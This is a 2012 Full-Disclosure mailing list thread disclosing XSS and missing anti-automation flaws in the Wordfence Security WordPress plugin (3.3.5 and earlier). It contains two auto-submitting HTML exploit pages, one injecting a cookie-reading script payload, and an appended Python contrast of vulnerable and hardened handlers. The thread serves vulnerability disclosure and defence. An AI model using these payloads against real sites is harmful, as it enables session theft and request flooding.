It's a bit like having a security alarm for an open door, IMHO.

On 20 October 2012 04:37, Philip Whitehouse <[email protected]> wrote:
> Hmm,
>
> Another 'security' plugin with vulnerabilities...
>
> What exactly is the point of them? Even in an ideal world surely WP should
> be secure anyway - doesn't it just increase the attack surface?
>
> Philip Whitehouse
>
> On 19 Oct 2012, at 18:16, "MustLive" <[email protected]> wrote:
>
> > Hello list!
> >
> > I want to warn you about Cross-Site Scripting and Insufficient
> > Anti-automation vulnerabilities in Wordfence Security for WordPress.
> >
> > Wordfence is a security plugin for WordPress.
> >
> > -------------------------
> > Affected products:
> > -------------------------
> >
> > Vulnerable are Wordfence Security 3.3.5 and previous versions.
> >
> > ----------
> > Details:
> > ----------
> >
> > XSS (WASC-08):
> >
> > Wordfence Security XSS.html
> >
> > <html>
> > <head>
> > <title>Wordfence Security XSS exploit (C) 2012 MustLive.
> > http://websecurity.com.ua</title>
> > </head>
> > <body onLoad="document.hack.submit()">
> > <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> > <input type="hidden" name="email"
> > value="<script>alert(document.cookie)</script>">
> > </form>
> > </body>
> > </html>
> >
> > Insufficient Anti-automation (WASC-21):
> >
> > Wordfence Security IAA.html
> >
> > <html>
> > <head>
> > <title>Wordfence Security IAA exploit (C) 2012 MustLive.
> > http://websecurity.com.ua</title>
> > </head>
> > <body onLoad="document.hack.submit()">
> > <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> > <input type="hidden" name="email" value="[email protected]">
> > </form>
> > </body>
> > </html>
> >
> > I've informed the plugin developer about these vulnerabilities and
> > mentioned them at my site (http://websecurity.com.ua/6106/).
> >
> > Best wishes & regards,
> > MustLive
> > Administrator of Websecurity web site
> > http://websecurity.com.ua
> >
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
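An added illustration of the two issues in the advisory above, written for this thread and not Wordfence's own code (it makes no claim about how the plugin is actually implemented): a stand-in "unlock by e-mail" handler that echoes the submitted address unescaped and accepts unlimited submissions, beside a hardened version that validates the address, encodes it on output and throttles requests per source. The class name UnlockEmailHandler, the limits and the sample addresses are constructed.

```python
# Added illustration, not Wordfence's code: a stand-in for an
# "unlock by e-mail" endpoint as the advisory describes it, beside a
# hardened version. Endpoint behaviour, names and limits are constructed.
import html
import re
import time
from collections import defaultdict, deque

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def unlock_email_vulnerable(params):
    """Reflects the 'email' POST field straight into the HTML response
    (the XSS pattern) and accepts any number of submissions (the
    insufficient anti-automation pattern)."""
    email = params.get("email", "")
    return f"<p>An unlock e-mail has been sent to {email}</p>"

class UnlockEmailHandler:
    """Hardened stand-in: strict input validation, output encoding, and a
    per-source sliding-window limit so repeated (possibly cross-site)
    form submissions cannot be used to flood unlock mails."""

    def __init__(self, max_requests=3, window_seconds=3600, clock=time.time):
        self.max_requests = max_requests
        self.window = window_seconds
        self.clock = clock               # injectable for deterministic tests
        self._hits = defaultdict(deque)  # source -> request timestamps

    def _allowed(self, source):
        now = self.clock()
        q = self._hits[source]
        while q and now - q[0] >= self.window:   # drop expired entries
            q.popleft()
        if len(q) >= self.max_requests:
            return False
        q.append(now)
        return True

    def handle(self, params, source):
        """Return (HTTP status, HTML body) for one POST to the endpoint."""
        if not self._allowed(source):
            return 429, "<p>Too many unlock requests; try again later.</p>"
        email = params.get("email", "")
        if not EMAIL_RE.fullmatch(email):
            return 400, "<p>Invalid e-mail address.</p>"
        # A valid address cannot contain '<' or '"', but encode on output
        # anyway so a later relaxation of the check cannot reopen the XSS.
        return 200, f"<p>An unlock e-mail has been sent to {html.escape(email)}</p>"
```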
